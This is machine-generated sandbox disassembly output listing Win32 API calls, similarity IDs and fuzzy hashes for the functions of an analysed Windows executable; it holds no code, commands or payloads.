                                                      • Instruction Fuzzy Hash: AB214135A00149AFCB10EFA5C985EEE7BB8EF89704B104069F909EB251DB31EA41CB61
                                                      APIs
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                        • Part of subcall function 00ABA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00ABA399
                                                        • Part of subcall function 00ABA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00ABA3AC
                                                        • Part of subcall function 00ABA37C: GetCurrentThreadId.KERNEL32 ref: 00ABA3B3
                                                        • Part of subcall function 00ABA37C: AttachThreadInput.USER32(00000000), ref: 00ABA3BA
                                                      • GetFocus.USER32 ref: 00ABA554
                                                        • Part of subcall function 00ABA3C5: GetParent.USER32(?), ref: 00ABA3D3
                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00ABA59D
                                                      • EnumChildWindows.USER32(?,00ABA615), ref: 00ABA5C5
                                                      • __swprintf.LIBCMT ref: 00ABA5DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                      • String ID: %s%d
                                                      • API String ID: 1941087503-1110647743
                                                      • Opcode ID: 7363f8155d08a0369670c41f713d3b05178e32e4dce3af366430b8bdf2d252a6
                                                      • Instruction ID: 0f08788ffbdd30fc09680906b4f0c56855ae89438b83b3b107f175bece89faff
                                                      • Opcode Fuzzy Hash: 7363f8155d08a0369670c41f713d3b05178e32e4dce3af366430b8bdf2d252a6
                                                      • Instruction Fuzzy Hash: 9711AFB5600208BBDF10BFA0DD85FEA37BCEF58700F044075BA18AA193CA709A468B75
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00AC2048
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                      • API String ID: 3964851224-769500911
                                                      • Opcode ID: 5ee7322412aee63d00c2ec4a72879a1d2e23629ca604fa4e343b2e53c9461789
                                                      • Instruction ID: 70d2b50a5ab00e9006633a703f1684800157b42ea669b2515d7a3721f51c7fce
                                                      • Opcode Fuzzy Hash: 5ee7322412aee63d00c2ec4a72879a1d2e23629ca604fa4e343b2e53c9461789
                                                      • Instruction Fuzzy Hash: A5118B30940109DFCF40EFA4C980AFEB3B1FF16304B5084A9D851AB292EB326D0ACB40
                                                      APIs
                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00ADEF1B
                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00ADEF4B
                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00ADF07E
                                                      • CloseHandle.KERNEL32(?), ref: 00ADF0FF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
APIs
  • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
  • Part of subcall function 00AE10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AE0038,?,?), ref: 00AE10BC
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AE0388
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00AE03C7
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00AE040E
• RegCloseKey.ADVAPI32(?,?), ref: 00AE043A
• RegCloseKey.ADVAPI32(00000000), ref: 00AE0447
Similarity
• API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
• String ID:
• API String ID: 3440857362-0
APIs
  • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
  • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
• LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00ADDC3B
• GetProcAddress.KERNEL32(00000000,?), ref: 00ADDCBE
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00ADDCDA
• GetProcAddress.KERNEL32(00000000,?), ref: 00ADDD1B
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00ADDD35
  • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AC7B20,?,?,00000000), ref: 00A65B8C
  • Part of subcall function 00A65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AC7B20,?,?,00000000,?,?), ref: 00A65BB0
Similarity
• API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
• String ID:
• API String ID: 327935632-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00ACE88A
• GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00ACE8B3
• WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00ACE8F2
  • Part of subcall function 00A69997: __itow.LIBCMT ref: 00A699C2
  • Part of subcall function 00A69997: __swprintf.LIBCMT ref: 00A69A0C
• WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00ACE917
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00ACE91F
Similarity
• API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
• String ID:
• API String ID: 1389676194-0
APIs
• GetCursorPos.USER32(?), ref: 00A62357
• ScreenToClient.USER32(00B267B0,?), ref: 00A62374
• GetAsyncKeyState.USER32(00000001), ref: 00A62399
• GetAsyncKeyState.USER32(00000002), ref: 00A623A7
Similarity
• API ID: AsyncState$ClientCursorScreen
• String ID:
• API String ID: 4210589936-0
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB695D
• TranslateAcceleratorW.USER32(?,?,?), ref: 00AB69A9
• TranslateMessage.USER32(?), ref: 00AB69D2
• DispatchMessageW.USER32(?), ref: 00AB69DC
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AB69EB
Similarity
• API ID: Message$PeekTranslate$AcceleratorDispatch
• String ID:
• API String ID: 2108273632-0
APIs
• GetWindowRect.USER32(?,?), ref: 00AB8F12
• PostMessageW.USER32(?,00000201,00000001), ref: 00AB8FBC
• Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AB8FC4
• PostMessageW.USER32(?,00000202,00000000), ref: 00AB8FD2
• Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AB8FDA
Similarity
• API ID: MessagePostSleep$RectWindow
• String ID:
• API String ID: 3382505437-0
APIs
• IsWindowVisible.USER32(?), ref: 00ABB6C7
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00ABB6E4
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ABB71C
• CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00ABB742
• _wcsstr.LIBCMT ref: 00ABB74C
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 00A62612: GetWindowLongW.USER32(?,000000EB), ref: 00A62623
• GetWindowLongW.USER32(?,000000F0), ref: 00AEB44C
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00AEB471
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AEB489
• GetSystemMetrics.USER32(00000004), ref: 00AEB4B2
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00AD1184,00000000), ref: 00AEB4D0
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AB9802
  • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AB9834
• __itow.LIBCMT ref: 00AB984C
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AB9874
• __itow.LIBCMT ref: 00AB9885
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A6134D
• SelectObject.GDI32(?,00000000), ref: 00A6135C
• BeginPath.GDI32(?), ref: 00A61373
• SelectObject.GDI32(?,00000000), ref: 00A6139C
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memcmp
                                                      • String ID:
                                                      • API String ID: 2931989736-0
                                                      • Opcode ID: 4ba93524e1850e384bf8700e02a7ca4206d763d09c8278abf71dc3f002cf685e
                                                      • Instruction ID: e1f2eaab717cece91f0894a84b206b4c885f7235fe41e55c47cc4d4dec38eeb5
                                                      • Opcode Fuzzy Hash: 4ba93524e1850e384bf8700e02a7ca4206d763d09c8278abf71dc3f002cf685e
                                                      • Instruction Fuzzy Hash: 6E0152B160510A7BE204B6296D42FFBB75CAF613A4F444625FE04B6283F6519E1383A1
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 00AC4D5C
                                                      • __beginthreadex.LIBCMT ref: 00AC4D7A
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00AC4D8F
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00AC4DA5
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00AC4DAC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                      • String ID:
                                                      • API String ID: 3824534824-0
                                                      • Opcode ID: a03b8da5e6747138a1970dec03b98b2f6b1256698c9753e0dc33273ab6937981
                                                      • Instruction ID: 9d60200e677406259e142434f5fb75b994cdb0dc2ce7a0736e57b07fe2c5da3a
                                                      • Opcode Fuzzy Hash: a03b8da5e6747138a1970dec03b98b2f6b1256698c9753e0dc33273ab6937981
                                                      • Instruction Fuzzy Hash: F011E1B2908288BFC711ABA89C48F9B7BACEB49320F15436DF915D7290DA758D4187A0
                                                      APIs
                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AB8766
                                                      • GetLastError.KERNEL32(?,00AB822A,?,?,?), ref: 00AB8770
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00AB822A,?,?,?), ref: 00AB877F
                                                      • HeapAlloc.KERNEL32(00000000,?,00AB822A,?,?,?), ref: 00AB8786
                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AB879D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 842720411-0
                                                      • Opcode ID: ecd0db6ff074f2f2b1afd353a270337cf1bb37b521443dd401f5422868296730
                                                      • Instruction ID: 0e4558556ced749b1a4990e2cc5cc6d73cda1dd6277043872fda54f8975f71f5
                                                      • Opcode Fuzzy Hash: ecd0db6ff074f2f2b1afd353a270337cf1bb37b521443dd401f5422868296730
                                                      • Instruction Fuzzy Hash: 1C016271200284FFDB108FA9DC88DA77B6CFF863557200539F949C6160DE318C41CB60
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC5502
                                                      • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AC5510
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC5518
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00AC5522
                                                      • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00AC555E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: PerformanceQuery$CounterSleep$Frequency
                                                      • String ID:
                                                      • API String ID: 2833360925-0
                                                      • Opcode ID: e1af6516112815b21a4a468a4bbd75de896385c295c457761ac7c0b18e292ed0
                                                      • Instruction ID: 6b916a49c97dc1e99e75479cadecb96e486baab2fbf23a8a361b24544684e7cb
                                                      • Opcode Fuzzy Hash: e1af6516112815b21a4a468a4bbd75de896385c295c457761ac7c0b18e292ed0
                                                      • Instruction Fuzzy Hash: CB015B35D00A1DDBCF00EFF9E988AEDBB79FB09701F41015AEA01B6240DB316590C7A1
                                                      APIs
                                                      • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?,?,00AB799D), ref: 00AB766F
                                                      • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB768A
                                                      • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB7698
                                                      • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?), ref: 00AB76A8
                                                      • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00AB758C,80070057,?,?), ref: 00AB76B4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: From$Prog$FreeStringTasklstrcmpi
                                                      • String ID:
                                                      • API String ID: 3897988419-0
                                                      • Opcode ID: e7cf4377d421cbf65ce9aaf5c09a8ff867c9b34168af30596d60280115a22e15
                                                      • Instruction ID: 7f971b8cc5cbebac1af96cf597b35482e715cb097e60d7b95561bbc80d7d201d
                                                      • Opcode Fuzzy Hash: e7cf4377d421cbf65ce9aaf5c09a8ff867c9b34168af30596d60280115a22e15
                                                      • Instruction Fuzzy Hash: 4A018472601604BFDB119F58DC84BEE7BADEB84751F144028FD04D6212E772DE419BA0
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00AB8608
                                                      • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00AB8612
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00AB8621
                                                      • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00AB8628
                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00AB863E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: ad7a678fa471ec369cf02287f8c97a1d0555d9f59c04398449617ac435ebd6dc
                                                      • Instruction ID: 8a153095655fcfde13675d25e032f888f4b89299145ce2788b09dc54bcba5d05
                                                      • Opcode Fuzzy Hash: ad7a678fa471ec369cf02287f8c97a1d0555d9f59c04398449617ac435ebd6dc
                                                      • Instruction Fuzzy Hash: 13F04F31201244AFEB104FE9DCD9EAB3BACEF8AB54F044529F945CA191EB659C42DB60
                                                      APIs
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00AB8669
                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8673
                                                      • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8682
                                                      • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB8689
                                                      • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00AB869F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: HeapInformationToken$AllocErrorLastProcess
                                                      • String ID:
                                                      • API String ID: 44706859-0
                                                      • Opcode ID: eab382f301bb475bb1a7de0fe26e0b599db55207f77de63ffc3bf5dc34944bff
                                                      • Instruction ID: 88c0c702be7e31c220ccc232994a58246b197026e075fc7debb3940fbe55c6a0
                                                      • Opcode Fuzzy Hash: eab382f301bb475bb1a7de0fe26e0b599db55207f77de63ffc3bf5dc34944bff
                                                      • Instruction Fuzzy Hash: F3F04471200284AFD7115FA5DCD8EA73BACEF85754F100125F545CA161DA759D41DB60
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003E9), ref: 00ABC6BA
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ABC6D1
                                                      • MessageBeep.USER32(00000000), ref: 00ABC6E9
                                                      • KillTimer.USER32(?,0000040A), ref: 00ABC705
                                                      • EndDialog.USER32(?,00000001), ref: 00ABC71F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                      • String ID:
                                                      • API String ID: 3741023627-0
                                                      • Opcode ID: df49d618a0a94bad394c64ff599ce12199efd2b91be55c4062d223a27285b8ae
                                                      • Instruction ID: 4de0a03962d5f6b07653436a7e5cb1c559503d14d952ff44a2361e051e623374
                                                      • Opcode Fuzzy Hash: df49d618a0a94bad394c64ff599ce12199efd2b91be55c4062d223a27285b8ae
                                                      • Instruction Fuzzy Hash: 69016D30500744ABEB219B60DD9EFA677BCFF00715F000669F686A54E2EBF0A9958F80
                                                      APIs
                                                      • EndPath.GDI32(?), ref: 00A613BF
                                                      • StrokeAndFillPath.GDI32(?,?,00A9BAD8,00000000,?), ref: 00A613DB
                                                      • SelectObject.GDI32(?,00000000), ref: 00A613EE
                                                      • DeleteObject.GDI32 ref: 00A61401
                                                      • StrokePath.GDI32(?), ref: 00A6141C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Path$ObjectStroke$DeleteFillSelect
                                                      • String ID:
                                                      • API String ID: 2625713937-0
                                                      • Opcode ID: 3d9aae17178fda043db429767fd448d333b2db9b3744372d5290a4c8b30512d1
                                                      • Instruction ID: c5b0479cdd54d1bc1fb74cd504a34d88dbd49b005a1a6c9b6e0e48719937a1df
                                                      • Opcode Fuzzy Hash: 3d9aae17178fda043db429767fd448d333b2db9b3744372d5290a4c8b30512d1
                                                      • Instruction Fuzzy Hash: EEF0C970004248EFDB259F66EC4D7683FB4E715326F08C226E5294E1F1DB354996DF50
                                                      APIs
                                                      • CoInitialize.OLE32(00000000), ref: 00ACC69D
                                                      • CoCreateInstance.OLE32(00AF2D6C,00000000,00000001,00AF2BDC,?), ref: 00ACC6B5
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
                                                      • CoUninitialize.OLE32 ref: 00ACC922
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_memmove
                                                      • String ID: .lnk
                                                      • API String ID: 2683427295-24824748
                                                      • Opcode ID: c6157efdf9b413efb4acbe821180dfae31c5d3ecff4f03a3c4d5543e21904cd7
                                                      • Instruction ID: 0def20460a520045f6c03a2ca1babb7aac6c44e019f7ece18c0fb2944c610c9b
                                                      • Opcode Fuzzy Hash: c6157efdf9b413efb4acbe821180dfae31c5d3ecff4f03a3c4d5543e21904cd7
                                                      • Instruction Fuzzy Hash: 0AA14A71108205AFD700EF64C991EABB7FCEF94754F04491CF1969B1A2EB70EA09CB52
                                                      APIs
                                                        • Part of subcall function 00A80FF6: std::exception::exception.LIBCMT ref: 00A8102C
                                                        • Part of subcall function 00A80FF6: __CxxThrowException@8.LIBCMT ref: 00A81041
                                                        • Part of subcall function 00A67F41: _memmove.LIBCMT ref: 00A67F82
